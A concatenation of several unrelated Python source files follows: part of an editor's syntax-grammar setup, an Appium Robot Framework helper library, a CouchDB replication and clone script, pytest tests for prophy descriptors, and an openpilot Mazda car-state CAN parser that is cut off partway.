v["errorsRe"] = re.compile(app.regex.join_re_list(v.get("errors", [])))
v["specialsRe"] = re.compile(
app.regex.join_re_list(v.get("special", []))
)
# contains and end re.
matchGrammars = []
markers = []
# Index [0]
if v.get("escaped"):
markers.append(v["escaped"])
matchGrammars.append(v)
else:
# Add a non-matchable placeholder.
markers.append(app.regex.kNonMatchingRegex)
matchGrammars.append(None)
# Index [1]
if v.get("end"):
markers.append(v["end"])
matchGrammars.append(v)
else:
# Add a non-matchable placeholder.
markers.append(app.regex.kNonMatchingRegex)
matchGrammars.append(None)
# |Contains| markers start at index 2.
for grammarName in v.get("contains", []):
g = self.grammars.get(grammarName, None)
if g is None:
self._raise_grammar_not_found()
markers.append(g.get("begin", g.get("matches", u"")))
matchGrammars.append(g)
# |Next| markers start after |contains|.
for grammarName in v.get("next", []):
g = self.grammars.get(grammarName, None)
if g is None:
self._raise_grammar_not_found()
markers.append(g["begin"])
matchGrammars.append(g)
# |Errors| markers start after |next| markers.
markers += v.get("errors", [])
# |Keywords| markers start after |errors| markers.
for keyword in v.get("keywords", []):
markers.append(r"\b" + keyword + r"\b")
# |Types| markers start after |keywords| markers.
for types in v.get("types", []):
markers.append(r"\b" + types + r"\b")
# |Special| markers start after |types| markers.
markers += v.get("special", [])
# Variable width characters are at index [-3] in markers.
markers.append(r"\t+")
# Potentially double wide characters are at index [-2] in markers.
markers.append(u"[\U00001100-\U000fffff]+")
# Carriage return characters are at index [-1] in markers.
markers.append(r"\n")
# app.log.startup('markers', v['name'], markers)
v["matchRe"] = re.compile(app.regex.join_re_list(markers))
v["markers"] = markers
v["matchGrammars"] = matchGrammars
containsGrammarIndexLimit = 2 + len(v.get("contains", []))
nextGrammarIndexLimit = containsGrammarIndexLimit + len(v.get("next", []))
errorIndexLimit = nextGrammarIndexLimit + len(v.get("errors", []))
keywordIndexLimit = errorIndexLimit + len(v.get("keywords", []))
typeIndexLimit = keywordIndexLimit + len(v.get("types", []))
specialIndexLimit = typeIndexLimit + len(v.get("special", []))
v["indexLimits"] = (
containsGrammarIndexLimit,
nextGrammarIndexLimit,
errorIndexLimit,
keywordIndexLimit,
typeIndexLimit,
specialIndexLimit,
)
# Reset the re.cache for user regexes.
re.purge()
def __set_up_file_types(self, defaultFileTypes):
self.nameToType = {}
self.extensions = {}
fileTypes = {}
for k, v in defaultFileTypes.items():
for name in v.get("name", []):
self.nameToType[name] = v.get("grammar")
for ext in v["ext"]:
self.extensions[ext] = v.get("grammar")
fileTypes[k] = v
if 0:
app.log.info("extensions")
for k, v in extensions.items():
app.log.info(" ", k, ":", v)
app.log.info("fileTypes")
for k, v in fileTypes.items():
app.log.info(" ", k, ":", v)
|
|
# -*- coding: utf-8 -*-
"""AppiumEnhanceLibrary is the enhancement of robotframework-appiumlibrary.
It will bring back these missing keywords from robotframework selenium2library.
Detail imformation could be found on github.com:
https://github.com/ScenK/robotframework-AppiumEnhanceLibrary
"""
import os
from robot.libraries.BuiltIn import BuiltIn
from selenium.webdriver.common.action_chains import ActionChains
class AppiumEnhanceLibrary(object):
"""AppiumEnhanceLibrary for supporting actions that not included in RF.
Support more keywords for AppiumLibrary.
Detail imformation about AppiumLibrary could be found on github.com:
https://github.com/jollychang/robotframework-appiumlibrary
"""
def __init__(self):
"""Init function.
Load and store configs in to variables.
"""
super(AppiumEnhanceLibrary, self).__init__()
self.apu = BuiltIn().get_library_instance('AppiumLibrary')
def execute_javascript(self, *code):
"""Execute the given JavaScript code.
`code` may contain multiple lines of code and may be divided into
multiple cells in the test data. In that case, the parts are
catenated together without adding spaces.
The JavaScript executes in the context of the currently selected
frame or window as the body of an anonymous function. Use _window_ to
refer to the window of your application and _document_ to refer to the
document object of the current frame or window, e.g.
_document.getElementById('foo')_.
This keyword returns None unless there is a return statement in the
JavaScript. Return values are converted to the appropriate type in
Python, including WebElements.
Examples:
| Execute JavaScript | window.my_js('arg1', 'arg2') | |
| ${sum}= | Execute JavaScript | return 1 + 1; |
| Should Be Equal | ${sum} | ${2} |
"""
js = self._get_javascript_to_execute(''.join(code))
return self.apu._current_application().execute_script(js)
def wait_until_element_is_visible(self, locator, timeout=None, error=None):
"""Wait until element specified with `locator` is visible.
Fails if `timeout` expires before the element is visible. See
`introduction` for more information about `timeout` and its
default value.
`error` can be used to override the default error message.
See also `Wait Until Page Contains`, `Wait Until Page Contains
Element`, `Wait For Condition`.
"""
def check_visibility():
visible = self._is_visible(locator)
if visible:
return
elif visible is None:
return error or "Element locator '%s' did not match any " \
"elements after %s" % \
(locator, self.apu._format_timeout(timeout))
else:
return error or "Element '%s' was not visible in %s" % \
(locator, self.apu._format_timeout(timeout))
self.apu._wait_until_no_error(timeout, check_visibility)
def wait_until_element_is_not_visible(self, locator, timeout=None,
error=None):
"""Wait until element specified with `locator` is not visible.
Fails if `timeout` expires before the element is not visible. See
`introduction` for more information about `timeout` and its
default value.
`error` can be used to override the default error message.
See also `Wait Until Page Contains`, `Wait Until Page Contains
Element`, `Wait For Condition`.
"""
def check_hidden():
visible = self._is_visible(locator)
if not visible:
return
elif visible is None:
return error or "Element locator '%s' did not match any " \
"elements after %s" % \
(locator, self.apu._format_timeout(timeout))
else:
return error or "Element '%s' was still visible in %s" % \
(locator, self.apu._format_timeout(timeout))
self.apu._wait_until_no_error(timeout, check_hidden)
def element_should_be_visible(self, locator, message=''):
"""Verify that the element identified by `locator` is visible.
Herein, visible means that the element is logically visible,
not optically visible in the current browser viewport. For example,
an element that carries display:none is not logically visible,
so using this keyword on that element would fail.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
visible = self._is_visible(locator)
if not visible:
if not message:
message = "The element '%s' should be visible, but it " \
"is not." % locator
raise AssertionError(message)
def element_should_not_be_visible(self, locator, message=''):
"""Verify that the element identified by `locator` is NOT visible.
This is the opposite of `Element Should Be Visible`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
visible = self._is_visible(locator)
if visible:
if not message:
message = "The element '%s' should not be visible, " \
"but it is." % locator
raise AssertionError(message)
def element_should_contain(self, locator, expected, message=''):
"""Verifies element identified by `locator` contains text `expected`.
If you wish to assert an exact (not a substring) match on the text
of the element, use `Element Text Should Be`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
actual = self._get_text(locator)
if not expected in actual:
if not message:
message = "Element '%s' should have contained text '%s' but " \
"its text was '%s'." % (locator, expected, actual)
raise AssertionError(message)
def wait_until_element_contains(self, locator, text, timeout=None,
error=None):
"""Wait until given element contains `text`.
Fails if `timeout` expires before the text appears on given element.
See `introduction` for more information about `timeout` and its
default value.
`error` can be used to override the default error message.
See also `Wait Until Page Contains`, `Wait Until Page Contains Element`
, `Wait For Condition`, `Wait Until Element Is Visible`.
"""
element = self.apu._element_find(locator, True, True)
def check_text():
actual = element.text
if text in actual:
return
else:
return error or "Text '%s' did not appear in %s to element " \
"'%s'. Its text was '%s'." \
% (text, self.apu._format_timeout(timeout),
locator, actual)
self.apu._wait_until_no_error(timeout, check_text)
def wait_until_element_does_not_contain(self, locator, text,
timeout=None, error=None):
"""Wait until given element does not contain `text`.
Fails if `timeout` expires before the text disappears from given
element. See `introduction` for more information about `timeout` and
its default value.
`error` can be used to override the default error message.
See also `Wait Until Page Contains`, `Wait Until Page Contains Element`
, `Wait For Condition`, `Wait Until Element Is Visible`.
"""
element = self.apu._element_find(locator, True, True)
def check_text():
actual = element.text
if text not in actual:
return
else:
return error or "Text '%s' did not disappear in %s from " \
"element '%s'." % (text,
self.apu._format_timeout(
timeout), locator)
self.apu._wait_until_no_error(timeout, check_text)
def page_should_contain(self, text):
"""Verify that current page contains `text`.
If this keyword fails, it automatically logs the page source
using the log level specified with the optional `loglevel` argument.
Giving `NONE` as level disables logging.
"""
self.apu.page_should_contain_text(self, text)
def page_should_not_contain(self, text):
"""Verify that current page not contains `text`.
If this keyword fails, it automatically logs the page source
using the log level specified with the optional `loglevel` argument.
Giving `NONE` as level disables logging.
"""
self.apu.page_should_not_contain_text(self, text)
def wait_for_condition(self, condition, timeout=None, error=None):
"""Wait until the given `condition` is true or `timeout` expires.
The `condition` can be arbitrary JavaScript expression but must contain
a return statement (with the value to be returned) at the end.
See `Execute JavaScript` for information about accessing the
actual contents of the window through JavaScript.
`error` can be used to override the default error message.
See `introduction` for more information about `timeout` and its
default value.
See also `Wait Until Page Contains`, `Wait Until Page Contains
Element`, `Wait Until Element Is Visible` and BuiltIn keyword
`Wait Until Keyword Succeeds`.
"""
if not error:
error = "Condition '%s' did not become true in <TIMEOUT>" % \
condition
self.apu._wait_until(timeout, error,
lambda: self.apu._current_application().
execute_script(condition) == True)
def get_horizontal_position(self, locator):
"""Return horizontal position of element identified by `locator`.
The position is returned in pixels off the left side of the page,
as an integer. Fails if a matching element is not found.
See also `Get Vertical Position`.
"""
x = self.apu.get_element_location(locator)['x']
return x
def get_vertical_position(self, locator):
"""Return vertical position of element identified by `locator`.
The position is returned in pixels off the left side of the page,
as an integer. Fails if a matching element is not found.
See also `Get Horizontal Position`.
"""
y = self.apu.get_element_location(locator)['y']
return y
def get_value(self, locator):
"""Return the value attribute of element identified by `locator`.
See `introduction` for details about locating elements.
"""
return self.apu.get_element_attribute(locator, 'value')
def get_text(self, locator):
"""Return the text value of element identified by `locator`.
See `introduction` for details about locating elements.
"""
return self._get_text(locator)
def mouse_down_at(self, locator, xoffset, yoffset):
"""Support `mouse down at` for AppiumLibrary.
Offsets are relative to the top-left corner of the element.
Args:
- locator: robot framework locator.
- xoffset: X offset to start.
- yoffset: Y offset to start.
Examples:
| Mouse Down At | id=canvas | 120 | 250 |
"""
element = self.apu._element_find(locator, True, True)
if element is None:
raise AssertionError("ERROR: Element %s not found." % locator)
ActionChains(self.apu._current_application()).\
move_to_element_with_offset(element, xoffset, yoffset).\
click_and_hold().perform()
def mouse_up_at(self, locator, xoffset, yoffset):
"""Support `mouse up at` for Selenium2Library.
Right now use click off-line button to end mouse behaviour.
Offsets are relative to the top-left corner of the element.
Args:
- locator: robot framework locator.
- xoffset: X offset to end.
- yoffset: Y offset to end.
Examples:
| Mouse Up At | id=canvas | 320 | 830 |
"""
element = self.apu._element_find(locator, True, True)
if element is None:
raise AssertionError("ERROR: Element %s not found." % locator)
# The release() function here could not rightly performed. Use click
# off-line button instead.
ActionChains(self.apu._current_application()).\
move_to_element_with_offset(element, 1, 1).\
move_by_offset(xoffset, yoffset).click().perform()
def drag_and_drop_by_offset(self, locator, xoffset, yoffset):
"""Drag element identified with locator.
Element will be moved by xoffset and yoffset, each of which is a
negative or positive number specify the offset.
Examples:
| Drag And Drop By Offset | myElem | 50 | -35 |
# Move myElem 50px right and 35px down. |
"""
element = self.apu._element_find(locator, True, True)
if element is None:
raise AssertionError("ERROR: Element %s not found." % locator)
ActionChains(self.apu._current_application()).\
drag_and_drop_by_offset(locator, xoffset, yoffset).perform()
def get_matching_xpath_count(self, xpath):
"""Returns number of elements matching `xpath`
One should not use the xpath= prefix for 'xpath'. XPath is assumed.
Correct:
| count = | Get Matching Xpath Count | //div[@id='sales-pop']
Incorrect:
| count = | Get Matching Xpath Count | xpath=//div[@id='sales-pop']
If you wish to assert the number of matching elements, use
`Xpath Should Match X Times`.
"""
count = len(self.apu._element_find("xpath=" + xpath, False, False))
return str(count)
def select_frame(self, locator):
"""Sets frame identified by `locator` as current frame.
Key attributes for frames are `id` and `name.` See `introduction` for
details about locating elements.
"""
element = self.apu._element_find(locator, True, True)
self.apu._current_application().switch_to_frame(element)
def unselect_frame(self):
"""Sets the top frame as the current frame."""
self.apu._current_application().switch_to_default_content()
def get_element_attribute(self, attribute_locator):
"""Return value of element attribute.
`attribute_locator` consists of element locator followed by an @ sign
and attribute name, for example "element_id@class".
"""
locator, attribute_name = self._parse_attribute_locator(
attribute_locator)
element = self.apu._element_find(locator, True, False)
if element is None:
raise ValueError("Element '%s' not found." % locator)
return element.get_attribute(attribute_name)
def get_element_size(self, locator):
"""Get element size
Examples:
| ${size}= | Get Element Size | css=.items |
"""
element_size = self.apu.get_element_size(locator)
size = (element_size['width'], element_size['height'])
return size
# Private
def _is_visible(self, locator):
element = self.apu._element_find(locator, True, False)
if element is not None:
return element.is_displayed()
return None
def _get_text(self, locator):
element = self.apu._element_find(locator, True, True)
if element is not None:
return element.text
return None
@staticmethod
def _parse_attribute_locator(attribute_locator):
parts = attribute_locator.rpartition('@')
if len(parts[0]) == 0:
raise ValueError(
"Attribute locator '%s' does not contain an element locator."
% attribute_locator)
if len(parts[2]) == 0:
raise ValueError(
"Attribute locator '%s' does not contain an attribute name."
% attribute_locator)
return parts[0], parts[2]
@staticmethod
def _get_javascript_to_execute(code):
codepath = code.replace('/', os.sep)
if not (os.path.isabs(codepath) and os.path.isfile(codepath)):
return code
codefile = open(codepath)
try:
return codefile.read().strip()
finally:
codefile.close()
|
|
#!/usr/bin/env python
import couchdb
import json
import argparse
import logbook
import sys
import os
import ConfigParser
from couchdb import PreconditionFailed
#Set up logging
l = logbook.Logger('CouchDB-Replicator')
class Config(object):
"""Singleton class that holds the confiuration for the CouchDB replicator.
"""
_instance = None
def __new__(self, *args, **kwargs):
if not self._instance:
self._instance = super(Config, self).__new__(self, *args, **kwargs)
return self._instance
def __init__(self, config_file=None):
config = ConfigParser.SafeConfigParser()
try:
if not config_file:
config_file = os.path.join(os.environ['HOME'], '.couchrc')
with open(config_file, 'r') as f:
config.readfp(f)
self.source = config.get('replication', 'SOURCE').rstrip()
self.destination = config.get('replication', 'DESTINATION').rstrip()
except:
l.error("Please make sure you've created your own configuration file \
(i.e: ~/.couchrc), and that it contains a source and a destination servers")
sys.exit(-1)
self.exceptions = [] if not config.has_section('exceptions') else \
[exception for _, exception in config.items('exceptions')]
self.roles = {"members": [],
"admins": []
}
if config.has_section('roles'):
if config.has_option('roles', 'members'):
self.roles['members'] = config.get('roles', 'members').split(',')
if config.has_option('roles', 'admins'):
self.roles['admins'] = config.get('roles', 'admins').split(',')
def _get_databases_info(source, destination, skip):
"""Returns a tuple containing a python representation of source and destination
couchDB instances. It also returns a list of the databases in both instances
(excluding the _replicator database).
"""
s_couch = couchdb.Server(source)
d_couch = couchdb.Server(destination)
_, _, s_dbs = s_couch.resource.get_json('_all_dbs')
_, _, d_dbs = d_couch.resource.get_json('_all_dbs')
l.info("Databases in the source CouchDB instance: {}".format(', '.join(s_dbs)))
l.info("Databases in the destination CouchDB instance: {}".format(', '.join(d_dbs)))
#We don't want to replicate the replicator DB, and want to skip the databases in skip list
skip.append('_replicator')
for db in skip:
try:
s_dbs.remove(db)
except ValueError:
pass
try:
d_dbs.remove(db)
except ValueError:
pass
return s_couch, d_couch, s_dbs, d_dbs
def _setup_continuous(source, destination, copy_security):
"""Set up a continuous replication of all databases in source to destination.
"""
s_couch, d_couch, s_dbs, d_dbs = _get_databases_info(source, destination)
#For each DB in the source CouchDB instance, create a replication document
#and get its _security object to put it in the destination database
for db in s_dbs:
_, _, security = s_couch[db].resource.get_json('_security')
doc = {
'name': '{}_rep'.format(db),
'source': '{}/{}/'.format(source, db),
'target': '{}/{}/'.format(destination, db),
'continuous': True
}
s_rep = s_couch['_replicator']
#Create the DB in the destination if not present
try:
d_couch.create(db)
l.info("Created {} database in destination".format(db))
except PreconditionFailed:
l.info("Database {} already existing in the destination, not creating it".format(db))
#Put the replicator document in source and set security object in destination
l.info("Putting replicator document in _replicator database of source")
s_rep.create(doc)
if copy_security:
l.info("Copying security object to {} database in destination".format(db))
d_couch[db].resource.put('_security', security)
l.info("DONE!")
def _clone(source, destination, copy_security, with_exceptions=False, skip=[]):
"""Creates a complete clone of source in destination.
WARNING: This action will remove ALL content from destination.
"""
l.info("Performing a complete clone from source to destination")
s_couch, d_couch, s_dbs, d_dbs = _get_databases_info(source, destination, skip)
config = Config()
#Delete all databases in destination
l.info("Removing all databases from destination")
for db in d_dbs:
d_couch.delete(db)
#Create all databases abailable in source to destination. Copy data and
#permissions
l.info("Re-creating databases from source into destination")
for db in s_dbs:
#The users database is never deleted
if not db == '_users':
d_couch.create(db)
_, _, security = s_couch[db].resource.get_json('_security')
source_db = '/'.join([source, db])
dest_db = '/'.join([destination, db])
l.info("Copying data from {} in source to destination".format(db))
d_couch.replicate(source_db, dest_db)
if copy_security:
l.info("Copying security object to {} database in destination".format(db))
d_couch[db].resource.put('_security', security)
if with_exceptions:
exceptions = config.exceptions
if not exceptions:
l.warn("--with-exceptions option was present, but didn't find " \
"any EXCEPTIONS list in your .couchrc file.")
else:
l.info("--with-exceptions option was present, removing following documents: {}".format(", ".join(exceptions)))
for exception in exceptions:
try:
d_couch[db].delete(d_couch[db].get(exception))
except:
l.warn("Document {} not found, not deleteing".format(exception))
l.info("DONE!")
def _set_roles(server):
"""Apply the list of roles present in .couchrc to all databases in the server.
"""
security_obj = {"admins": {
"names":[],
"roles":[]
},
"members": {
"names":[],
"roles":[]
}
}
config = Config()
security_obj['admins']['roles'] = config.roles['admins']
security_obj['members']['roles'] = config.roles['members']
s_couch, d_couch, s_dbs, d_dbs = _get_databases_info(source, destination)
l.info("Setting roles to destination databases: {}".format(str(security_obj)))
for db in d_dbs:
d_couch[db].resource.put('_security', security_obj)
if __name__ == "__main__":
DESCRIPTION = """Set up complete one-way replication for CouchDB.
Use this script if you want to configure a stage database that will have the
exact same content of your production database.
To do so, the script creates a replication document for each database in the
source CouchDB instance that replicates such database (in continuous mode)
to the destination database.
Security object (permissions per database), are put to the destination databases.
"""
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('action', type=str, help = "Action to perform, either \
configure continuous replication (continuous) or punctual clone (clone)")
parser.add_argument('--source', type=str, help = "Source CouchDB instance, \
with the credentials included in the URL. I.E: http://admin:passw@source_db:5984")
parser.add_argument('--destination', type=str, help = "Destination CouchDB instance, \
with the credentials included in the URL. I.E: http://admin:passw@destination_db:5984")
parser.add_argument('--no-security', action='store_const', const=True, \
help='Do not copy security objects')
parser.add_argument('--with-exceptions', action='store_const', const=True, \
help='List of files to be deleted from the DataBases after being copied. ' \
'To be specified in your .couchrc file')
parser.add_argument('--set-roles', action='store_const', const=True, \
help='List of roles to apply to each database after copied. Only if' \
'--no-security is present.')
parser.add_argument('--skip', nargs="+", type=str,
help=('List of databases to skip during the replication. '
'They will remain intact in the destination database'))
args = parser.parse_args()
source = args.source
destination = args.destination
copy_security = False if args.no_security else True
action = args.action
config = Config()
if not all([source, destination]):
source = config.source
destination = config.destination
actions = ['continuous', 'clone']
if action not in actions:
raise ValueError("Action not recognised, please choose between %s" % \
', '.join(actions))
l.info("Starting replication - source: {}, destination: {}".format( \
source.split('@')[-1], destination.split('@')[-1]))
if action == "continuous":
_setup_continuous(source, destination, copy_security)
else:
_clone(source, destination, copy_security, with_exceptions=args.with_exceptions, skip=args.skip)
if args.set_roles:
if not args.no_security:
l.warn('--set-roles option only takes effect if applied together ' \
'with --no-security. Ignoring it')
else:
_set_roles(destination)
|
|
import prophy
import pytest
def get_integer_class1(_type):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("value", _type)]
return X
def get_optional_class1(_type):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("value", prophy.optional(_type))]
return X
def get_array_class1(_type):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("value", prophy.array(_type))]
return X
def get_array_class2(_type):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("value", prophy.array(_type, size=4))]
return X
def get_array_class3(_type):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value", prophy.array(_type, size=4))]
return X
def get_array_bound_class1(_type):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("len", prophy.u32),
("value", prophy.array(_type, bound="len"))]
return X
def get_array_bound_class2(_type):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("len", prophy.i32),
("value", prophy.array(_type, bound="len"))]
return X
def get_enum_class1():
class X(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
_enumerators = [
("x", 1),
("y", 2),
]
return X
def get_enum_class2():
class X(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
_enumerators = [
("x", 1),
("y", 3),
]
return X
def get_enum_class3():
class X(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
_enumerators = [
("x", 1),
("z", 3),
]
return X
def get_fixed_bytes():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value", prophy.bytes(size=5))]
return X
def get_bound_bytes():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value_len", prophy.u32),
("value", prophy.bytes(bound="value_len"))]
return X
def get_shift_bound_bytes():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value_len", prophy.u8),
("value", prophy.bytes(bound="value_len", shift=2))]
return X
def get_limited_bytes():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value_len", prophy.u32),
("value", prophy.bytes(size=5, bound="value_len"))]
return X
def get_greedy_bytes():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value", prophy.bytes())]
return X
@pytest.mark.parametrize('_type', [
prophy.i8,
prophy.i16,
prophy.i32,
prophy.i64,
prophy.u8,
prophy.u16,
prophy.u32,
prophy.u64,
prophy.r32
])
def test_compare_descriptors_scalars(_type):
x = get_integer_class1(_type)
y = get_integer_class1(_type)
assert x == y
@pytest.mark.parametrize('_type', [
prophy.i8,
prophy.i16,
prophy.i32,
prophy.i64,
prophy.u8,
prophy.u16,
prophy.u32,
prophy.u64,
prophy.r32
])
def test_compare_descriptors_arrays(_type):
a, b = get_array_bound_class1(_type), get_array_bound_class1(_type)
c, d = get_array_bound_class2(_type), get_array_bound_class2(_type)
e, f = get_array_class1(_type), get_array_class1(_type)
g, h = get_array_class2(_type), get_array_class2(_type)
i, j = get_array_class3(_type), get_array_class3(_type)
assert a == b
assert c == d
assert e == f
assert g == h
assert i == j
assert a != c
assert a != e
assert a != g
assert a != i
assert c != e
assert c != g
assert c != i
assert e != g
assert e != i
assert g != i
@pytest.mark.parametrize('_type', [
prophy.i8,
prophy.i16,
prophy.i32,
prophy.i64,
prophy.u8,
prophy.u16,
prophy.u32,
prophy.u64,
prophy.r32
])
def test_compare_descriptors_optional(_type):
x = get_optional_class1(_type)
y = get_optional_class1(_type)
assert x == y
def test_compare_enum():
x, y = get_enum_class1(), get_enum_class1()
z = get_enum_class2()
w = get_enum_class3()
assert x == y
assert x != z
assert x != w
assert z != w
def test_compare_bytes():
a, b = get_fixed_bytes(), get_fixed_bytes()
c, d = get_bound_bytes(), get_bound_bytes()
e, f = get_greedy_bytes(), get_greedy_bytes()
g, h = get_limited_bytes(), get_limited_bytes()
assert a == b
assert c == d
assert e == f
assert g == h
assert a != c
assert a != e
assert a != g
assert c != e
assert e != g
|
|
from cereal import car
from selfdrive.config import Conversions as CV
from opendbc.can.can_define import CANDefine
from opendbc.can.parser import CANParser
from selfdrive.car.interfaces import CarStateBase
from selfdrive.car.mazda.values import DBC, LKAS_LIMITS, GEN1
class CarState(CarStateBase):
def __init__(self, CP):
super().__init__(CP)
can_define = CANDefine(DBC[CP.carFingerprint]["pt"])
self.shifter_values = can_define.dv["GEAR"]["GEAR"]
self.crz_btns_counter = 0
self.acc_active_last = False
self.low_speed_alert = False
self.lkas_allowed_speed = False
self.lkas_disabled = False
def update(self, cp, cp_cam):
ret = car.CarState.new_message()
ret.wheelSpeeds = self.get_wheel_speeds(
cp.vl["WHEEL_SPEEDS"]["FL"],
cp.vl["WHEEL_SPEEDS"]["FR"],
cp.vl["WHEEL_SPEEDS"]["RL"],
cp.vl["WHEEL_SPEEDS"]["RR"],
)
ret.vEgoRaw = (ret.wheelSpeeds.fl + ret.wheelSpeeds.fr + ret.wheelSpeeds.rl + ret.wheelSpeeds.rr) / 4.
ret.vEgo, ret.aEgo = self.update_speed_kf(ret.vEgoRaw)
# Match panda speed reading
speed_kph = cp.vl["ENGINE_DATA"]["SPEED"]
ret.standstill = speed_kph < .1
can_gear = int(cp.vl["GEAR"]["GEAR"])
ret.gearShifter = self.parse_gear_shifter(self.shifter_values.get(can_gear, None))
ret.genericToggle = bool(cp.vl["BLINK_INFO"]["HIGH_BEAMS"])
ret.leftBlindspot = cp.vl["BSM"]["LEFT_BS1"] == 1
ret.rightBlindspot = cp.vl["BSM"]["RIGHT_BS1"] == 1
ret.leftBlinker, ret.rightBlinker = self.update_blinker_from_lamp(40, cp.vl["BLINK_INFO"]["LEFT_BLINK"] == 1,
cp.vl["BLINK_INFO"]["RIGHT_BLINK"] == 1)
ret.steeringAngleDeg = cp.vl["STEER"]["STEER_ANGLE"]
ret.steeringTorque = cp.vl["STEER_TORQUE"]["STEER_TORQUE_SENSOR"]
ret.steeringPressed = abs(ret.steeringTorque) > LKAS_LIMITS.STEER_THRESHOLD
ret.steeringTorqueEps = cp.vl["STEER_TORQUE"]["STEER_TORQUE_MOTOR"]
ret.steeringRateDeg = cp.vl["STEER_RATE"]["STEER_ANGLE_RATE"]
# TODO: this should be from 0 - 1.
ret.brakePressed = cp.vl["PEDALS"]["BRAKE_ON"] == 1
ret.brake = cp.vl["BRAKE"]["BRAKE_PRESSURE"]
ret.seatbeltUnlatched = cp.vl["SEATBELT"]["DRIVER_SEATBELT"] == 0
ret.doorOpen = any([cp.vl["DOORS"]["FL"], cp.vl["DOORS"]["FR"],
cp.vl["DOORS"]["BL"], cp.vl["DOORS"]["BR"]])
# TODO: this should be from 0 - 1.
ret.gas = cp.vl["ENGINE_DATA"]["PEDAL_GAS"]
ret.gasPressed = ret.gas > 0
# Either due to low speed or hands off
lkas_blocked = cp.vl["STEER_RATE"]["LKAS_BLOCK"] == 1
if self.CP.minSteerSpeed > 0:
# LKAS is enabled at 52kph going up and disabled at 45kph going down
# wait for LKAS_BLOCK signal to clear when going up since it lags behind the speed sometimes
if speed_kph > LKAS_LIMITS.ENABLE_SPEED and not lkas_blocked:
self.lkas_allowed_speed = True
elif speed_kph < LKAS_LIMITS.DISABLE_SPEED:
self.lkas_allowed_speed = False
# TODO: the signal used for available seems to be the adaptive cruise signal, instead of the main on
# it should be used for carState.cruiseState.nonAdaptive instead
ret.cruiseState.available = cp.vl["CRZ_CTRL"]["CRZ_AVAILABLE"] == 1
ret.cruiseState.enabled = cp.vl["CRZ_CTRL"]["CRZ_ACTIVE"] == 1
ret.cruiseState.speed = cp.vl["CRZ_EVENTS"]["CRZ_SPEED"] * CV.KPH_TO_MS
if ret.cruiseState.enabled:
if not self.lkas_allowed_speed and self.acc_active_last:
self.low_speed_alert = True
else:
self.low_speed_alert = False
# Check if LKAS is disabled due to lack of driver torque when all other states indicate
# it should be enabled (steer lockout). Don't warn until we actually get lkas active
# and lose it again, i.e, after initial lkas activation
ret.steerFaultTemporary = self.lkas_allowed_speed and lkas_blocked
self.acc_active_last = ret.cruiseState.enabled
self.crz_btns_counter = cp.vl["CRZ_BTNS"]["CTR"]
# camera signals
self.lkas_disabled = cp_cam.vl["CAM_LANEINFO"]["LANE_LINES"] == 0
self.cam_lkas = cp_cam.vl["CAM_LKAS"]
self.cam_laneinfo = cp_cam.vl["CAM_LANEINFO"]
ret.steerFaultPermanent = cp_cam.vl["CAM_LKAS"]["ERR_BIT_1"] == 1
return ret
@staticmethod
def get_can_parser(CP):
signals = [
# sig_name, sig_address
("LEFT_BLINK", "BLINK_INFO"),
("RIGHT_BLINK", "BLINK_INFO"),
("HIGH_BEAMS", "BLINK_INFO"),
("STEER_ANGLE", "STEER"),
("STEER_ANGLE_RATE", "STEER_RATE"),
("STEER_TORQUE_SENSOR", "STEER_TORQUE"),
("STEER_TORQUE_MOTOR", "STEER_TORQUE"),
("FL", "WHEEL_SPEEDS"),
("FR", "WHEEL_SPEEDS"),
("RL", "WHEEL_SPEEDS"),
("RR", "WHEEL_SPEEDS"),
]
checks = [
# sig_address, frequency
("BLINK_INFO", 10),
("STEER", 67),
("STEER_RATE", 83),
("STEER_TORQUE", 83),
("WHEEL_SPEEDS", 100),
]
if CP.carFingerprint in GEN1:
signals += [
("LKAS_BLOCK", "STEER_RATE"),
("LKAS_TRACK_STATE", "STEER_RATE"),
("HANDS_OFF_5_SECONDS", "STEER_RATE"),
("CRZ_ACTIVE", "CRZ_CTRL"),
("CRZ_AVAILABLE", "CRZ_CTRL"),
("CRZ_SPEED", "CRZ_EVENTS"),
("STANDSTILL", "PEDALS"),
("BRAKE_ON", "PEDALS"),
("BRAKE_PRESSURE", "BRAKE"),
("GEAR", "GEAR"),
("DRIVER_SEATBELT", "SEATBELT"),
("FL", "DOORS"),
("FR", "DOORS"),
("BL", "DOORS"),
("BR", "DOORS"),
("PEDAL_GAS", "ENGINE_DATA"),
("SPEED", "ENGINE_DATA"),
("CTR", "CRZ_BTNS"),
("LEFT_BS1", "BSM"),
("RIGHT_BS1", "BSM"),
]
checks += [
("ENGINE_DATA", 100),
("CRZ_CTRL", 50),
("CRZ_EVENTS", 50),
("CRZ_BTNS", 10),
("PEDALS", 50),
("BRAKE", 50),
("SEATBELT", 10),
("DOORS", 10),
("GEAR", 20),
("BSM", 10),
]
return CANParser(DBC[CP.carFingerprint]["pt"], signals, checks, 0)
@staticmethod
def get_cam_can_parser(CP):
signals = []
checks = []
if CP.carFingerprint in GEN1:
signals += [
# sig_name, sig_address
("LKAS_REQUEST", "CAM_LKAS"),
("CTR", "CAM_LKAS"),
("ERR_BIT_1", "CAM_LKAS"),
